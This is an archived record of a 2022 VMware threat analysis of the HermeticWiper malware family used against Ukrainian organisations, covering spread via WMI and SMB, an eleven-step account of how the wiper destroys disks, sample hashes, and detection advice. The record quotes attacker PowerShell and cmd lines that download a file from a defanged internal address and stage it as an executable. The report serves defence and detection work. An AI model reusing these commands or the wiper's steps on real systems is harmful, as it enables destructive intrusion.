{
	"id": "d8a87348-547f-44c3-80ea-53a1a4137f8e",
	"created_at": "2026-04-06T00:10:06.363378Z",
	"updated_at": "2026-04-10T03:19:58.115436Z",
	"deleted_at": null,
	"sha1_hash": "458b4068051828e9d5d36a05498f453fbd6c665b",
	"title": "Hermetic Malware: Multi-component Threat Targeting Ukraine Organizations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 605482,
	"plain_text": "Hermetic Malware: Multi-component Threat Targeting Ukraine Organizations\r\nBy Giovanni Vigna, Oleg Boyarchuk, Stefano Ortolani\r\nPublished: 2022-03-04 · Archived: 2026-04-05 23:19:12 UTC\r\nContributors: Giovanni Vigna, Oleg Boyarchuk, Stefano Ortolani\r\nIntroduction\r\nThe continued assault on Ukraine will go down in history as the first one that was truly carried out both kinetically on the battlefield and virtually using cyberattacks against the computer infrastructure of the invaded nation.\r\nAs the invasion started and escalated, new malware threats were introduced by malicious actors to harm Ukrainian organizations. Early in the assault, security researchers observed the emergence of new threats that appear to have been developed ad hoc to serve as key tools in cyber-war efforts.\r\nIn addition to well-known attacks and threats, such as network DDoS and ransomware, these threats included “wipers,” whose sole purpose is the disabling of the targeted hosts, often combined with other tools that allow the attackers to infect the largest number of hosts possible.\r\nWhile these attacks targeted specific organizations, there is a substantial risk that, in the highly connected, distributed environments used to exchange and share information in multi-national organizations, these attacks might spill beyond their intended targets.\r\nIt is therefore of paramount importance to understand these threats in order to help protect both Ukrainian organizations and the rest of the world. To this end, CISA has published a series of guidelines to understand and prepare for possible Russian state-sponsored attacks. 
VMware Security has provided an overview of this Shields Up guidance, along with additional threat intelligence resources for VMware customers here.\r\nIn mid-January, Microsoft warned about a wiper malware threat, called WhisperGate, targeting Ukrainian organizations. This particular threat acts as a wiper that irreversibly corrupts a target while posing as ransomware.\r\nThen, right before the start of the Russian invasion, researchers at ESET identified a series of components that, together, worked to cripple Ukrainian target networks: HermeticWiper, HermeticWizard, and HermeticRansom. The names of these samples are derived from the certificate that was used to sign the binary (the signing company is Hermetica Digital Ltd, but according to a Reuters report this is not the result of a compromised certificate: it is possible that the threat actors posed as the owners of the company when contacting the certification authority).\r\nHermeticWiper is the destructive payload, while HermeticWizard is the tool that leverages WMI and SMB in order to spread to additional hosts. Finally, HermeticRansom is a ransomware sample written in Go.\r\nAttack Vector\r\nThe attack was multi-target, resulting in each company being compromised in a slightly different manner; for example, Symantec in their analysis reported two different exploits used in the attacks (TA0001) carried out against the investigated targets: one targeting Microsoft SQL Server (CVE-2021-1636) and another affecting Apache Tomcat. 
While it might be too early to have a complete picture of all possible paths of entry, the TTPs employed during the execution and lateral propagation phases are a bit more consistent.\r\nBoth ESET and Symantec detail a combination of WMI/SMB techniques; in particular, the decoded PowerShell commands used to download and execute foreign artifacts follow a structure consistent with a tool known to ease the deployment of\r\nhttps://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/\r\nPage 1 of 5\n\nsemi-interactive shells:\r\ncmd.exe /Q /c powershell -c \"(New-Object System.Net.WebClient).DownloadFile('hxxp://192.168.3.13/email.jpeg','CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1')\" 1> \\\\127.0.0.1\\ADMIN$\\__1636727589.6007507 2>&1: this command was used to move a local resource (JPEG file) laterally.\r\ncmd.exe /Q /c move CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1 CSIDL_WINDOWS\\policydefinitions\\postgresql.exe 1> \\\\127.0.0.1\\ADMIN$\\__1636727589.6007507 2>&1: this command was used to execute the task coded in the postgresql.exe executable.\r\nIn both cases, we can see that the structure of the command redirects the output (>) to a temporary file located in the ADMIN$ share, which is then accessible by the user account with local administrator privileges. 
Both the technique and the temporary file name match impacket’s wmiexec, whose source code is available at https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py; see Figure 1 for a fragment.\r\nFigure 1: wmiexec.py snippet executing a command on a remote host.\r\nThe technique relies on spawning a command interpreter (cmd) on the target system via the Windows Management Instrumentation (WMI); on the network side, this translates into two different TCP connections (ports 135 and 445) for the initial negotiation and file transfer (SMB), followed by another connection to the “Winmgmt Windows service” over a dynamically allocated port for the actual command communication and execution. The number of different connections that need to be established simultaneously provides a useful anomaly that NDR systems can easily leverage.\r\nESET also reports cases where HermeticWiper was deployed using Group Policy settings (GPO), a technique that VMware TAU has seen widely adopted by ransomware actors when deploying scheduled tasks to automate lateral propagation. While it will be a while before Incident Response teams are able to detail all intrusions, there are already five different HermeticWiper samples known to the public (see Table 1). In the next section, we analyze some of the samples in more detail and shed some light on the differences between them.\r\nHermetic Wiper\r\nA wiper is malware whose aim is to make a system unavailable in the fastest and most reliable way; a slow wiper would give the user a chance to interrupt the process before completion, and being unreliable would defeat its main purpose. The engineers who coded HermeticWiper made sure that both aspects were adequately addressed; the following list of steps details how:\r\n1. Obtain the SeBackupPrivilege privilege for unlimited file write privileges.\r\n2. 
Disable memory dumps by zeroing the CrashDumpEnabled value of the HKLM\\SYSTEM\\CurrentControlSet\\Control\\CrashControl registry key.\r\n3. Extract epmntdrv.sys from its resources and store it on disk. Note that epmntdrv.sys is a legitimate benign driver developed by EaseUS (a company providing data recovery and backup software).\r\n4. Obtain the SeLoadDriverPrivilege privilege to gain the ability to load a driver.\r\n5. Create a service for the dropped epmntdrv.sys to finally load the driver.\r\n6. Stop the VSS (Volume Shadow Copy) service to disable backups.\r\n7. Read the geometry of every disk attached to the system by accessing the low-level device \\\\.\\PhysicalDriveX.\r\n8. Initiate a delayed system reboot.\r\n9. Disable displaying compressed and encrypted NTFS files in color by zeroing the ShowCompColor parameter of the HKU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced registry key.\r\n10. Disable pop-ups for files in Explorer by zeroing the ShowInfoTip value of the same registry key.\r\n11. 
Use the \\\\.\\EPMNTDRV device provided by epmntdrv.sys to fully wipe the disks.\r\nFigure 2: Visual representation of the binary diff between the two types of samples.\r\nWe analyzed all five samples, and while the implemented functionalities are an exact match, there are a couple of details that differ: the most prominent is a check to determine the presence of “C:\\Windows\\SYSVOL” by invoking the “GetFileAttributesW” API, see Figure 2; if we are to believe the compilation timestamp, this is done only by the two most recent samples (see Table 1); coincidentally, only the most recent sample is signed, as if the authors forgot to sign the sample after implementing the SYSVOL check, and had to quickly add the signature prior to the actual deployment.\r\nFigure 3: Decompiled main function that invokes “GetFileAttributesW”.\r\nSYSVOL is a folder that resides on every domain controller within a domain; the default location for the SYSVOL is C:\\Windows\\SYSVOL. 
By checking the presence of this directory before rebooting the system, HermeticWiper makes sure it is not as destructive on domain controllers; the attacker might have planned to retain control of those systems (even if for just a little longer) to propagate laterally further, although the presence of the HermeticWizard worm, as detailed by ESET, might have made this step not as critical as it usually is.\r\nTable 1: HermeticWiper samples known to date.\r\nFirst VT submission | Compilation timestamp | Signed? | Checking Sysvol? | sha256\r\n2022-02-23 18:14:17 UTC | Wed Feb 23 10:48:53 2022 | Signed by Hermetica Digital Ltd | Yes | 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d2925\r\n2022-02-25 11:44:15 UTC | Wed Feb 23 10:48:53 2022 | No | Yes | 06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c\r\n2022-02-24 17:29:39 UTC | Tue Dec 28 09:37:16 2021 | Signed by Hermetica Digital Ltd | No | 2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf\r\n2022-02-24 17:29:39 UTC | Tue Dec 28 09:37:16 2021 | Signed by Hermetica Digital Ltd | No | 3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b\r\n2022-02-24 06:35:51 UTC | Tue Dec 28 09:37:16 2021 | Signed by Hermetica Digital Ltd | No | 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece2\r\nBesides this detail, all samples have 100% overlapping code. In conclusion, we made sure that NSX ATA customers were adequately protected, and we verified that all samples were detected as malicious. 
Figure 4 shows the verdict and behavioral summary after submitting HermeticWiper for analysis: we can see all the identified behaviors in detail, including activities like “loading a kernel driver” or “accessing the disk with low-level routines”, both essential for the wiper to carry out its nefarious tasks.\r\nFigure 4: NSX ATA analysis of ‘0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da’.\r\nConclusions\r\nDestructive attacks against a nation’s infrastructure cause network disruptions and affect the distribution of goods and services.\r\nTherefore, in the current situation in which malware threats are deployed as cyber-weapons, it is necessary to increase the alert level and continuously update protection mechanisms with the latest intelligence about these threats.\r\nIn addition, the use of effective authentication procedures combined with network segmentation and restrictive policies can severely limit the ability of attackers to obtain initial access to computer networks and deploy their malware.\r\nSource: https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/"
	],
	"report_names": [
		"hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434206,
	"ts_updated_at": 1775791198,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/458b4068051828e9d5d36a05498f453fbd6c665b.pdf",
		"text": "https://archive.orkl.eu/458b4068051828e9d5d36a05498f453fbd6c665b.txt",
		"img": "https://archive.orkl.eu/458b4068051828e9d5d36a05498f453fbd6c665b.jpg"
	}
}